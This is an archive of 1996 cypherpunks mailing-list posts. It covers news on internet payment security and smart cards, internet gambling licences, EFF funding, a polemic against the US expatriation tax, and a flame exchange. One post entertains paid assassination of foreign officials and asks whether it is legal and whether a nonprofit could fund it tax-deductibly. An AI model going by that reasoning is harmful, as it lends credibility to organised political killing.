By M. Arthur Gillis; Gillis is president of Computer Based Solutions,
Inc., a banking technology consultancy in Dallas. His Internet address
is artgillis@aol.com



Financial Times:Thursday, August 29, 1996

Online Shopping Plan Claims Better Security

Uunet Pipex on the Internet not only met widespread concerns about
security but was more secure than buying by phone or in a shop with a
credit or debit card.

The company, the UK subsidiary of MFS, the US telecoms operator bought
earlier this week by WorldCom of the US and one of the largest European
Internet service providers, believes its system is in advance of US
developments.

The British system is backed by National Westminster Bank, which will
act as the clearing house for online debits and credit card
transactions. Uunet Pipex said the system, called "The Bureau", will
enable customers to buy goods from electronic "shops" on the Internet in
safety and with security.

Merchants trading on the Internet will be able to take advantage of an
established payments mechanism without the cost of building their own.

Shopping over the Internet has been possible for some time but its
popularity has been held back by concerns over security. Potential
customers are reluctant to trust the Net with their credit card
information. Nevertheless, online electronic commerce is believed to be
worth $300m ({GBP193m) annually at present and rising.

Among the organisations seeking to develop secure shopping and payments
systems are card companies Visa, Mastercard and American Express and
software developers Microsoft, Netscape Communications and Verifone.
Internet merchants sign up with Uunet Pipex and pay 5 per cent of the
purchase value per transaction.

The system is activated when a customer presses the "buy" key and enters
his or her credit information. It is then stored securely by Uunet who
instructs NatWest to pay the merchant for the purchase. When the deal is
complete electronic confirmations are generated for customer and
merchant.

Mr Richard Nuttall, Uunet Pipex director of electronic commerce, said:
"Until now, security concerns have deterred buyers and sellers from
doing business over the Net. We have created a comparatively low cost
system that is more secure than buying goods on an ordinary credit or
debit card."

Four merchants have already signed up to use the system. Responsibility
for establishing an electronic shop on the Net remains with the
merchant. Many believe the quality of the images of goods for sale is a
more effective deterrent to Internet commerce than fears over payment
security.

The principle advantage of "The Bureau" over competitive systems seems
to be the ease and low cost of adoption. Mr Susen Sarkar of the London
technology consultancy, Ovum, said: "The launch of The Bureau will
remove anxieties for both merchants and consumers." Other UK groups,
notably Barclays Bank, already offer Internet shopping services and
British Telecommunications is testing a large-scale online shopping
service.




American Banker: Thursday, August 29, 1996

On-Line Banks Unsure About What Kind of Web to Weave

JENNIFER KINGSON BLOOM

Most banks want to do more with their Web sites, but aren't exactly sure
what, according to a survey of banks that have presences on the
Internet.

Netmarquee Online Services Inc., a Needham, Mass., company that offers
on-line information for family businesses, conducted the survey this
month.

Of 150 banks in the survey, 65% wanted to enhance their content so that
people would visit the Web sites more often.

"A good number of these banks put Web sites up nine months or a year
ago, and they're saying, 'Now what?'," said David Gumpert, president of
Netmarquee.

"They're coming to realize that they need to do something more than an
electronic brochure, to provide some kind of value added to their
prospects and customers besides just saying, 'Aren't we great?'"

Mr. Gumpert's survey, conducted by telephone, found that traffic ranged
from 100 to 500 visits a month. Only 5% of banks surveyed said they were
actively promoting or advertising their Web sites.

The survey also found that the larger the bank, the more interested it
was in using the Internet for business purposes.

Banks now are devising a variety of ways to draw repeat traffic to their
sites, including trivia quizzes and mortgage calculators.

Mr. Gumpert's company sells packages of information relevant to small
businesses, and he is trying to coax banks to subscribe to his
information service, which provides monthly updates. One bank that is
considering a subscription to Netmarquee's product is Bank of Boston
Corp.

Ray Graber, marketing manager for the Web site, said the bank is looking
at ways to provide interactive features, like on-line account
applications or account transfer capabilities.

Mr. Graber said the bank is also considering a service called "Rentnet"
that lists apartment rentals on the Internet and might prove helpful to
the many college students in the Boston area.



Financial Post (Canada): Tuesday, August 27, 1996

Smart Cards Don't Have All the Answers-- Yet

By MOTOKO RICH and GEORGE GRAHAM

In Mission Impossible, Tom Cruise's latest film, the fearless Ethan Hunt
breaks into the CIA computer room, disarming a technological stronghold
by punching in numerical codes and submitting his eyes for a retina
scan.

While most viewers see such high-tech wizardry as fantastic, some of the
gadgets may not be far from reality. Researchers worldwide are
experimenting with technology that would allow not only security
barriers but also electronic payment systems to use the retina, the
handprint or even a facial expression as an identification method.

"We are moving into the electronic age where money will just be
information about the wealth you have," says Hans van der Velde,
president of the European Union region of Visa International. Some
companies believe that parts of the body, rather than paper or coins,
can be used to establish the amount of money somebody has available to
spend.

For the time being, however, most participants in the payment industry
believe the best alternative to cash remains the humble, but universal,
plastic card.

An increasing number of payment card organizations are replacing the
magnetic strip -- the present industry standard -- with a tiny computer
microchip that enables cards to be used not only to carry out financial
transactions, but also to store data about the card's owner.

A chip-based card is much more difficult to counterfeit than the
magnetic stripe card and can carry details of a cardholder's insurance
policies, medical history or driver's licence. It can be used to manage
a retailer's loyalty program and even be used as a key for house or car.

Above all, as a plethora of experiments demonstrates, it can be used as
an "electronic wallet" storing value instead of petty cash. Pilot
programs from the U.S. to Australia are testing the capabilities of
these cards.

In Britain, the most advanced trial is being conducted by Mondex,
originally backed by National Westminster Bank and Midland Bank, and now
owned by 17 banks. During the past year, Mondex has invited customers to
use the cards in Swindon, where they can pay for small items like
newspapers or chocolate bars without coins or notes.

The cards are loaded up with value debited from the customer's bank
account at automated teller machines or on "smart" telephones. Retailers
can then take funds off the card without having to authorize each
transaction online.

While Mondex is in a race with other global payment organizations to
develop and market its version of the electronic wallet on a global
basis, several regional projects are harnessing the smart-card
technology for a number of payment applications.

Transcard, operated in western Sydney by Card Technologies Australia,
combines an electronic bus pass with a re-loadable cash card that clocks
up loyalty bonus points for buying McDonald's hamburgers or entry to the
local swimming pool. In France, customers can pay for taxi rides,
newspapers and phone calls with virtually ubiquitous smart cards.

Sponsors of these projects are enthusiastic about the early results.
"The technology works. That's probably more of a shock to people than
anything else," says Beth Horowitz, MasterCard's vice-president for chip
card business in Australia.

Live testing has resolved some questions. Almost everyone now agrees
that the electronic wallet must be reloadable, not a disposable
fixed-value card that has been used for telephone cards or in Visa's
Atlanta pilot.

But for those who wish to exploit the global market -- worth an
estimated US$ 4.3 trillion -- for card payments, there are some issues
that remain unresolved.

One is standards, an issue that plagues all new technological
innovations, from the Internet to videocasette tapes. Although Europay,
MasterCard and Visa, the largest global retail payments organizations,
have developed international standards for chip cards, some systems --
notably Mondex -- do not comply. "The issue of standards has complicated
the market for 15 years," says Gerald Hawkins, manager of card services
at Lloyd's TSB in Britain. "It is one of the reasons why Mondex, while
clearly a very advanced development, has taken a bit of a knock."

The idea of a standard is that it would guarantee interoperability among
systems, because retailers will want multiple terminals to accept
different cards.

Mondex argues that the market, rather than standards, will determine
which cards will operate in point-of-sale terminals. It says that a
number of these terminal suppliers have already demonstrated that
interoperable equipment can be made to accept Mondex and all other
magnetic stripe and chip cards.

In fact, the EMV standards themselves have been criticized because they
stick to "contact" technology, in which the chip must come into physical
contact with a reader inside a slot. For high-volume applications in
places such as railways or buses, contactless technology, in which a
card contains a small radio transmitter or a stripe that can be read
with a quick swipe, are considered more appropriate.

"A contact smart card in a mass transit environment is just too slow,"
says John Hall, general manager for retail banking services for the
Credit Union Services Corp. of Australia. The biggest problem of all,
however, is ensuring the smart card makes financial sense.

"The reason for all these projects is that no one has proven the
business case. I'll be really interested to see if anyone makes money
out of this," says Eugene Lockhart, president and chief executive of
MasterCard International. The business case for the smart card has
receded because telecommunications charges that once made online
verification expensive are now coming down, and with them fraud rates.

"Ten years ago you could justify the wallet on the basis that it would
cut costs," says Peter Hirsch, managing director of consultants Retail
Banking Research. "But now telecommunication costs are coming down and
the business case is getting weaker. The chip is too expensive to give
short-term returns."

But at about US$ 14 apiece, a smart electronic wallet -- though more
expensive than a magnetic stripe card -- is not completely devoid of
financial advantages.

Cash, which the wallet would partly displace, is expensive. The
Association of Payment Clearing Services in London estimates that
handling cash costs the British financial services industry about US$
4.24 billion a year. For banks, the wallet could offer the chance to
undo some of their past mistakes. In Australia, for example, the banks
have pressed cards so far that they are being used for much lower value
purchases than banks would like.

"We don't think much of paying 20 cents to process a 95 cents
transaction at McDonald's," says Hall of the Australian credit unions.

For merchants, the replacement of cash means the elimination of
considerable hassle. "If you take cash, you have to take it home, count
it, put it into a night safe and then pay it into the bank the next
day," says Richard Jackson, manager of Victoria News in Swindon, which
accepts the Mondex card.

But many retailers are likely to resist paying for the "privilege" of
accepting the wallets. "Of course, there will be tough negotiations
between individual banks and retailers," says Ron Clark, chief executive
of Mondex in Britain. "We had this battle over Switch [the British debit
card brand] with retailers who said they wanted us to provide it for
free. But over time they have paid for it because it is a business
proposition."

Consumers, on the other hand, may prove much more difficult to convince
that an electronic wallet is worth paying for when they can get cash for
free.

But Transcard charges US$ 7.82 a card, and says customers gladly pay it
because the cost is covered within two weeks by the free bus rides they
earn through a loyalty bonus scheme.

"We have categorically proved that the consumer will pay," said David
MacSmith, managing director of Card Technologies Australia.

But it still may be difficult to persuade consumers to abandon cash
altogether. "We are going to have a migration period of at least 10
years," said Lockhart of MasterCard. It will take even longer for more
technologically advanced developments like the retina scan to move out
of the film world into the marketplace.

Richard Tyson-Davies, director-general of Apacs said: "The card is one
of the most standardized items in the world. It is tremendously accepted
and recognized so it would be a very bold person who threw that away."


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 17 Sep 1996 23:07:03 +0800
To: cypherpunks@toad.com
Subject: no internet gambling
Message-ID: <Pine.GSO.3.93.960917133357.27150C-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



From todays Baltic News Service newswire (my free translation):

According to the ministry of finance of Estonia, they will not give any
licences or permission to organize Internet gambling or lotteries in
Estonia. 

The reason given was, that arranging lotteries on the Internet would take
the activity outside from Estonia. According to the news, the only
Internet gambling licences given out are in Liechtenstein and Ahvenamaa
(part of Finland).

My question is: how easy it is to get a licence for Internet casino in
either Liechtenstein or some off-shore country (Belize, Bahamas etc) ? I
believe Belize was one of the first to sign legislation on Internet
gambling, does anyone have more information about the costs and
requirements?

Jüri Kaljundi
AS Stallion
jk@stallion.ee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 18 Sep 1996 08:36:24 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <v02130503ae644adb01ad@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 16 Sep 1996, Steve Schear wrote:
>
>> Someone wrote:
>
>> >The problem is that assasination rarely leads to the installation of
>> >a government that is any better. In most cases it gets worse.
>
>[...]
>
>> We've all heard these arguments, but are they true?  Who says so, and how
>> can they be certain? Jim's suggestion has never, to my knowledge, been
>> tried on a consistant, large, scale.  When all conventional alternatives
>> have been tried and fail, what have we or the starving children got to
>> lose?
>
>I think "Lord of the Flies" answers this question quite well.

Does it?  LOTF was fiction.  Can you identify a recent instance in which a
non-governmental organization attempted to influence political/military
events via a concerted AP?

>
>> Is it legal for citizens of the U.S. to engage in contract killing of
>> foreign military, politations, etc?  How about U.S. or foreign non-profits?
>
>As to the first, yes.  (There are several anti-mercenary statutes on the
>books)  As to the second, I don't understand the question.
>
So, you're saying it is legal for citizens?

The second question was whether a non-profit org. could raise
tax-deductible funds to conduct such operations.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 18 Sep 1996 09:31:57 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Why organizations turn statist.
In-Reply-To: <199609150312.UAA02749@dns2.noc.best.net>
Message-ID: <199609172104.OAA12280@eff.org>
MIME-Version: 1.0
Content-Type: text/plain



 James A. Donald typed:
> The EFF is ultimately a business lobby group, because it gets
> most of its funding from businesses.  

Faulty logic.  A does not follow from B.  I have news for you: Most 
nonprofits get most of their funding from businesses.  In some cases, 
corporations offer funding because the organization exists to represent 
their corporate donors (such things are variously called industry 
associations, trade groups, and in some cases PACs.) Others give to 
organizations that are centered on a written mission statement, rather 
than on the flexible interests of the donors, and the give because it 1) 
improves their market or customer base in various ways, and 2) allows 
them to claim philanthropy and charity, which are marketable traits.

There's a very large difference between organizations that exist to 
represent the interests of members and donors, whatever those interests 
happen to be at the moment, and organizations with specific mission 
statements. It doesn't do well to confuse the two.  It's the difference 
between the Business Software Alliance and the Free Software Foundation,
between the Telephone Association of America and Voters' Telecom Watch.

> It is therefore potentially
> subject to the same corruption as other business lobbies.

This is assumption not fact.  The facts are that EFF accepts donations 
from companies that support our mission. If they expect to get some kind 
of trade association style "representation" for that, they are deluded.
What they get is our work to help the Net grow and flourish, which is 
good for their business. That's the perq they get. Nothing else. 

If you don't believe this, I invite you to ask all of the RBOCs whether 
they give us money any more. They used to, but didn't listen and expected 
us to act like their PAC, particularly on Digital Telephony. Instead of 
fighting for RBOCs' "rights" we fought for YOURS. They don't fund us any 
more. We don't care.  Our mission doesn't bend to attract funders. It's 
stayed the same since day one.  You may think EFF didn't do a good job on 
DigTel, but we didn't do Bell Atlantic's dance, that's for sure. And why 
don't you ask our boardmember Tim O'Reilly whether EFF has asked him to 
stop combatting MicroSoft attempts to license how many IP connections 
people can make with NT Server, because it hurts our chances of getting 
money from Bill Gates.
 
EFF has certainly be *pressured* to behave like a PAC, and this was one 
of our many reasons for leaving DC. It became increasingly difficult to 
fund a DC-based organization that was *not* a membership-controlled 
lobbying organization.  We're betting on one thing: That the software, 
online commerce, and related industries, centered on Silicon Valley, can be
dragged into the politics that are threatening to stomp them.  It's been 
observed multiple times by several commentators that some key differences 
between this industry and older industries are 1) lack of philanthropy - 
almost no charitable organization support is seen from the computer 
industry at all, and 2) participation in the political process - there 
really hasn't been much action of any kind from the computer industry in 
legislative or legal issues in general, only on specific stuff like their
particular intellectual property rights, even though some of the 
political issues cropping up on the Hill threaten their entire market.
Most analysis concludes that these two lacking features are due to youth 
of the industry, and lack of anyone pushing them into action. So, we're 
pushing. If we fail, we won't be here in 1997.

EFF does not want to be a PAC. We *can't* be a PAC. We don't have the 
necessary skill set (we have a membership coordinator, we have civil 
liberties attorneys, etc.  We do not have professional lobbyists, nor do 
we have an on-staff media and PR communicator, as some examples.)  We'd 
like to see the industry recognize that what we're doing is vital for 
them, and to support it, but also to get their own trade associations 
going and working and actually engaged in the political process (for one 
thing, that further reduces any desire to try to get EFF to play that 
role, which we will not do. Less wasted time and effort pushing us, and 
less of the same from us pushing back.)

I hope this explains the situation fairly clearly.


> To be a successful lobby group, the EFF needs to get its
> fingerprints on legislation, so that it can make threats and
> promises to businessmen in the computer industry.

EFF isn't interested in being "a successful lobby group". That's CDT's job.
You may have missed some of the history here: CDT's core staff is our 
former policy staff. They split off because they wanted to do lobbying 
work, and EFF didn't.

> Our interests, and the EFF's interest are opposed with no
> apparent mutual good possible.

That's absurd.  I suppose you think ITAR and the CDA are good things? If 
not, then our work to defeat them is mutual good.
 
> In order to be well funded, the EFF needs government
> regulation of the net.  The kind of regulation that would be

That's absurd, too.  I suppose there's a hidden grain of logic there: EFF 
would have little or no reason to exist without some kind of bad action 
on the part of government when it comes to the Net.  This is true. We all 
would be really happy if that weren't the case and there was no need for 
an EFF. The day the government stops censoring and EFF can go away will 
be the happiest day of my life if it ever happens.  Hell, I could be making 
3x my current salary in the commercial sector. If you think I do this 
because I enjoy working 12 hour days fighting the largest government on 
earth, for a paycheck that only barely covers the bills, you have another 
think coming. At any rate, there is no logical connection whatsoever 
between the grain of truth here, and your conclusion (that EFF must be 
working to *increase* government control to keep itself alive).  There 
are many assumptions that one is required to make before arrival at
that conclusion from the data, and some of these conclusions are not 
only contradictory, but precluded by other observable facts.

[...]
> most effective in ensuring large donations would be regulation
> that compels internet businessmen to lobby the government.
> for example regulations that make impossible, inconsistent, and
> contradictory requirements on those who provide software,
[...]

In other words you are claiming EFF authored the Communications Decency Act?

[...]
> of business,  for example legislation that requires case 
> by case approval of software, or legislation that compels
> the businessman to invade his customers privacy, and also
> prohibits him from invading that privacy unless he has a
> waiver issued by the state.

In other words, you are claiming EFF is not really behind the Bernstein 
v. US Dept. of State suit to get rid of the only existing US "legislation 
that requires case by case approval of software"?

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Dell <tdell@netscape.com>
Date: Wed, 18 Sep 1996 09:33:13 +0800
To: cypherpunks@toad.com
Subject: Re: Wealth Tax vs. Capital Gains Tax Reduction
In-Reply-To: <ae6440c1040210045195@[207.167.93.63]>
Message-ID: <323F13CA.7523@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Needless to say, I despise the idea of a "wealth tax," and I can
> see various loopholes and workarounds. I'd also expect a lot of
> folks to simply move out of the country if this were to happen.

Not without difficulty. While this is not from a reliable source,
it does seem that the gov't is aware of this issue.

Tom

tdell@netscape.com



Subject: The Expat Tax Is Law - The Door Is Now Closed!
Date: 16 Sep 1996 18:38:52 -0700
From: taxhaven@ix.netcom.com (Adam Starchild)
Reply-To: privacy@ftc.gov


         The Expat Tax Is Law - The Door Is Now Closed!

                               by

                         Marc M. Harris

     After last year's failed attempt to pass an American
expatriate tax, the U.S. Treasury Department succeeded in
sneaking the provisions into the miscellaneous revenue positions
of the recently passed Health Coverage Availability and
Affordability Act of 1996.  Given the failure of their high
profile campaign last year, the Treasury Department switched
strategies this year and undertook one of stealth.  While the
press was talking about tax-deductible contributions to medical
savings accounts (MSAs), provisions tightening the expatriation
tax rules were implemented.  Foreign grantor trust rules were
also tightened under the law.
     In order to provide the health insurance and care benefits
provided under the law, a separate tax title adds certain revenue
raising provisions.  In general, these revenue offsets add
provisions aimed at making certain the United States get their
fair share plus some when U.S. citizens and permanent residents
expatriate.  In short, Uncle Sam would like to tell its
expatriates that they earned their money from the United States,
not in it.
     A review of selected sections of the Congressional Record
provides some additional insight into the thinking behind these
new provisions.

          "It has come to the attention of Congress that some
     very wealthy individuals have been relinquishing their
     citizenship to avoid U.S. income, estate and gift tax.  The
     bill does not want to discourage citizens from exercising
     their right to expatriate, but does not want to provide a
     tax incentive for such an action..."

     If Congress truly wanted to eliminate the incentive for
expatriation, it might be better to eliminate high taxation and
put an end to the litigation crisis rather than creating another
layer of government regulation and bureaucracy.

          "Congress believes the changes are consistent with
     existing tax treaties in conferring a tax credit for taxes
     paid in the foreign country, and to the extent they are
     inconsistent, the Treasury Department will re-negotiate the
     treaties to account for the changes.  The new provisions
     take precedence over any treaties..."

     To make certain that other countries will not benefit from
America's brain drain, the United States will once again embark
on a campaign to bully other nations into accepting America's
oppressive system of taxation and regulation.

          "This bill would subject former citizens to the
     expatriation provisions with no inquiry into their motive
     and requires individuals who exchange property that would
     otherwise be exempt from U.S. taxation as foreign source
     income must immediately recognize U.S. source income on any
     gain from such a transaction.  The Secretary is authorized
     to issue regulations to treat removal of tangible property
     from the U.S. and other conversions to foreign source
     income.  For example, any income from stock transferred to a
     foreign source, such as dividends, would be converted to
     U.S. source and immediately taxed..."

     Logic dictates that if this tax were to approach 100%, it
would look quite similar to currency controls and foreign
investment prohibitions.  Since it only goes about half of the
way, we can assume that we are 50% down the road toward American
currency and foreign investment controls.

          "A new information reporting requirement has been added
     requiring former citizens and long-term residents to
     complete information reporting at the time of
     expatriation..."

     Just to make certain that no one escapes from the United
States without leaving all their wealth behind, the new
information reporting requirements will make certain that the
Treasury Department always knows where your assets are placed. 
Of course, if you fail to report, civil and criminal sanctions
will apply.  The new treaty negotiations will most likely include
provisions to extradite those "expat tax evaders" back home for
their "criminal act" of leaving a country that was once known as
the home of the free.  Our sources at the Internal Revenue
Service tell us this treaty provision will be known as the Hotel
California provision -- you can check out, buy you can never
leave.

          "The bill also requires that a U.S. person that
     receives a distribution from a trust must report that to the
     Service..."

     Now Uncle Sam is not only seeking to penalize those patriots
that have placed their funds out of harm's way, but now the
potential recipients of those receipts.  If the logic of current
money laundering statutes apply as they do in most tax cases, the
bank that accepts the cashing of the beneficiary's distribution
check from a foreign trust will be a co-conspirator in this
"unpatriotic" affair.

          "Effective for transfers made after February 6, 1995,
     if a non-resident alien becomes a resident within five years
     of transferring property to a foreign trust, the transferor
     will be considered to have transferred the property on the
     date he became a resident..."

     The Statue of Liberty stands as America's great symbol of
open immigration with its famous inscription "give us your tired
and poor."  With this provision, any person who hopes to emigrate
to the United States will definitely become tired of complying
with U.S. regulations and poor after he complies with them.

          "If a U.S. person receives more than $10,000 worth of
     gifts from one foreign person during any tax year, he must
     file a report with the Service.  If he fails to file a
     report, the Service has the sole discretion to determine the
     taxation of the property received by the U.S. person and the
     person is liable for a penalty of 5 percent of the value of
     the gift for each month he fails to file a report..."

     Currency controls and foreign investment restrictions work
both ways.  Not only will governments prevent you from sending
your money out, but they will also prevent you from sending your
money in without their fair share plus some.

          "The Service has the power to prescribe regulations to
     prevent the avoidance of the Estate, Trust and Beneficiary
     part of the Code..."

     This provision is known as an Abusive Transaction provision. 
It is commonly referred to by international human rights
organizations as the arbitrary and capricious application of
laws.

          "Once the Secretary of the Treasury establishes a
     reasonable belief that the expatriate's loss of U.S.
     citizenship would result in a substantial reduction in
     estate, inheritance, legacy, and succession taxes, the
     burden of proving that one of the principal purposes of the
     loss of U.S. citizenship was not avoidance of U.S. income or
     estate tax is on the executor of the decedent's estate..."

     If these provisions were making you feel a bit suicidal,
please forget it.  Uncle Sam is not only going to pursue you to
the grave, but also your executors and heirs.

     Other items in the Congressional Record provide an even
greater insight into Washington's motivations:

          "Because U.S. citizens who retain their citizenship are
     subject to income tax on accrued appreciation when they
     dispose of their assets, as well as estate tax on the full
     value of assets that are held until death, the Committee
     believes it fair and equitable to tax expatriates on the
     appreciation in their assets when they relinquish their U.S.
     citizenship.  The Committee believes that an exception from
     the expatriation tax should be provided for individuals
     whose income and net worth are relatively modest..."

     If you are poor, you may leave; however, if you were a
productive American in the United States that no longer exists,
you must stay and pay or leave behind the fruits of your
productivity.  America's Second Civil War has begun and it is
known as Class Warfare.

          "Exceptions from the expatriation tax are provided for
     individuals.  (An) exception applies to a U.S. citizen who
     relinquishes citizenship before reaching age 18-1/2,
     provided that the individual was a resident of the United
     States for no more than 5 taxable years before such
     relinquishment..."

     Since one cannot renounce their American citizenship prior
to their 18th birthday, the children of an American resident
overseas have only 6 months to renounce their citizenship and
avoid the application of these laws.  Ho many 18 year olds are
capable of making this type of decision?

          "Under the provision, an individual is permitted to
     elect to defer payment of the expatriation tax with respect
     to the deemed sale of any property.  Under this election,
     the expatriation tax with respect to a particular property,
     plus interest thereon, is due when the property is
     subsequently disposed of.  In order to elect deferral of the
     expatriation tax, the individual is required to provide
     adequate security to ensure that the deferred expatriation
     tax and interest ultimately will be paid...  In the event
     that the security provided with respect to a particular
     property subsequently becomes inadequate and the individual
     fails to correct such situation, the deferred expatriation
     tax and interest with respect to such property becomes due. 
     As a further condition to making this election, the
     individual is required to consent to the waiver of any
     treaty rights that would preclude the collection of the
     expatriation tax."

     Only in Congress could one dream of a law that requires its
former citizens to waive their rights in a foreign country in
order to escape from the political, social, and economic tyranny
of the United States.

          "Under the provision, special rules apply to trust
     interests held by the individual at the time of
     relinquishment of citizenship or termination of residency. 
     In addition, an individual who holds (or who is treated as
     holding) a trust interest at the time of relinquishment of
     citizenship or termination of residency is required to
     disclose on his or her tax return the methodology used to
     determine his or her interest in the trust, and whether such
     individual knows (or has reason to know) that any other
     beneficiary of the trust uses a different method..."

     The latter provision is known as the "Stool Pigeon" clause -
- you are required to turn your fellow beneficiaries over to the
Internal Revenue Service.  Similar laws existed in Nazi Germany
that encouraged children to turn their parents and neighbors over
to the authorities.

          "If the individual holds an interest in a trust that is
     not a qualified trust, a special rule applies for purposes
     of determining the amount of the expatriation tax due with
     respect to such trust interest.  Such separate trust is
     treated as having sold its assets as of the date of
     relinquishment or citizenship or termination of residency
     and having distributed all proceeds to the individual, and
     the individual is treated as having recontributed such
     proceeds to the trust.  The individual is subject to the
     expatriation tax with respect to any net income or gain
     arising from the deemed distribution from the trust.  A
     beneficiary's interest in a non-qualified trust is the basis
     of all facts and circumstances.  If the individual has an
     interest in a qualified trust, a different set of rules
     applies.  In determining this amount, all contingent and
     discretionary interests are resolved in the individual's
     favor (i.e. the individual is allocated the maximum amount
     that he or she potentially could receive under the terms of
     the trust instrument)..."

     The United States is quite generous in calculating the tax
based on the maximum possible distribution.  In their arrogance,
it appears that the law does not detail how to recover the excess
tax if the maximum level is never reached.  Alternatively,
Congress never intended for former Americans to comply with this
law.

          "If the individual does not agree to such a waiver of
     treaty rights, the tax with respect to distributions to the
     individual is imposed on the trust, the trustee is
     personally liable therefor, and any other beneficiary of the
     trust will have a right of contribution against such
     individual with respect to such tax."

     Based on the above, no foreign financial institution with
offices or business in the United States would accept the
trusteeship of an American's assets.

          "Under the provision, an individual is permitted to
     make an irrevocable election to continue to be taxed as a
     U.S. citizen with respect to all property that otherwise is
     covered by the expatriation tax.  This election is an "all-
     or-nothing" election;..."

     Congress is quite generous with this provision in allowing
expatriating Americans to continue being chased by tax collectors
for the rest of their lives overseas.

          "Under the provision, an individual is treated as
     having relinquished U.S. citizenship on the date that the
     individual first makes known to a U.S. government or
     consular officer his or her intention to relinquish U.S.
     citizenship...  A U.S. citizen who furnishes to the State
     Department a signed statement of voluntary relinquishment of
     U.S. nationality, confirming the performance of an
     expatriating act with the requisite intent to relinquish his
     or her citizenship is treated as having relinquished his or
     her citizenship on the date the statement is so furnished
     (regardless of when the expatriating act was performed),
     provided that the voluntary relinquishment is later
     confirmed by the issuance of a CLN (Certificate of Loss of
     Nationality).  If neither of these circumstances exist, the
     individual is treated as having relinquished citizenship on
     the date a CLN is issued or a certificate of naturalization
     is cancelled.  The date of relinquishment of citizenship
     determined under the provision applies for all tax
     purposes..."

     Based on this provision, almost any American who now wishes
to undertake the expatriation route will be subject to the tax. 
In short, the door has closed for most Americans.

          "Under the provision, the exclusion from income does
     not apply to the value of any property received by gift or
     inheritance from an individual who was subject to the
     expatriation tax.  Accordingly, a U.S. taxpayer who receives
     a gift or inheritance from such an individual is required to
     include the value of such gift or inheritance in gross
     income and is subject to U.S. income tax on such amount..."

     This implies that if an American expatriate sends funds back
to support his aging parents, his parents will need to treat
these gifts as taxable income.  If the parents fail to report
these amounts, they could also suffer civil and criminal
penalties associated with tax evasion.

          "Under the provision, an individual who relinquishes
     citizenship or terminates residency is required to provide a
     statement which includes the individual's social security
     number, forwarding foreign address, new country of residence
     and citizenship and, in the case of individuals with a net
     worth of at least $500,000, a balance sheet..."

     Given the desire to obtain balance sheets from expatriating
Americans, it is only a matter of time before the IRS requires
the inclusion of personal balance sheets of individual taxpayers
with their Form 1040s or at least those they suspect might wish
to expatriate.

          "In the case of a former citizen, such statement is due
     not later than the date the individual's citizenship is
     treated as relinquished and is provided to the State
     Department..."

     In short, this means that you cannot obtain your certificate
of loss of nationality without providing the information to the
United States government.

          "Further, the provision requires the Secretary of the
     Treasury to publish in the Federal Register the names of all
     former U.S. citizens with respect to whom it receives the
     required statements or whose names it receives under the
     foregoing information-sharing provisions..."

     Now your friends and neighbors can know that you have
expatriated.  Although Congress respects the right of Americans
to expatriate, it will publish your name in the federal register
as if expatriation were a criminal act.

          "The provision directs the Treasury Department to
     undertake a study on the tax compliance of U.S. citizens and
     green-card holders residing outside the United States and to
     make recommendations regarding the improvement of such
     compliance.  The findings of such study and such
     recommendations are required to be reported to the House
     Committee on Ways and Means and the Senate Committee on
     Finance within 90 days of the date of enactment..."

     Uncle Sam has awoken to the fact that most Americans living
overseas are the most likely individuals to expatriate and as a
result, they are gearing up to create a machine to attack them as
well.

          The provision is effective for U.S. citizens whose date
     of relinquishment of citizenship (as determined under the
     provision occurred on or after February 6, 1995.  U.S.
     citizens who committed an expatriating act with the
     requisite intent to relinquish their U.S. citizenship prior
     to February 6, 1995, but whose date of relinquishment of
     citizenship (as determined under the provision) does not
     occur until after such date, are subject to the expatriation
     tax..."

     This means that if you have not already relinquished your
citizenship or have only done so recently, you are subject to the
expat tax.  The door has closed, but not completely. 

                        About the Author

     Marc M. Harris is a certified public accountant and
president of The Harris Organization.  He has already developed a
strategy for legally avoiding the expat tax, which he discusses
only in personal appointments.  

                Copyright 1996 by Marc M. Harris

-----------------------------------------------------------------

Posted by Adam Starchild
     The Offshore Entrepreneur at http://www.au.com/offshore





The privacy list is run automatically by the Majordomo list manager.
Send a "help" command to majordomo@ftc.gov for assistance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 18 Sep 1996 02:24:03 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IBM_gak
In-Reply-To: <Pine.SUN.3.94.960917011314.27534C-100000@polaris>
Message-ID: <199609171425.IAA10655@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.960917011314.27534C-100000@polaris>, on 09/17/96 
   at 01:13 AM, Black Unicorn <unicorn@schloss.li> said:

= .On Mon, 16 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
= .> 
= .> Apparently, senile Tim May (fart) is a Clinton administration troll planted
= .> here to sabotage any discussions of actual crypto work and to flood this
= .> mailing list with lies and personal attacks and to make it unusable.
= .>
= .If so, it would seem you fell for it and failed to resist the temptation
= .to type the word "fart" out- yet again.

        and here I took the trouble to take Dr. Dimitri off the kill list;
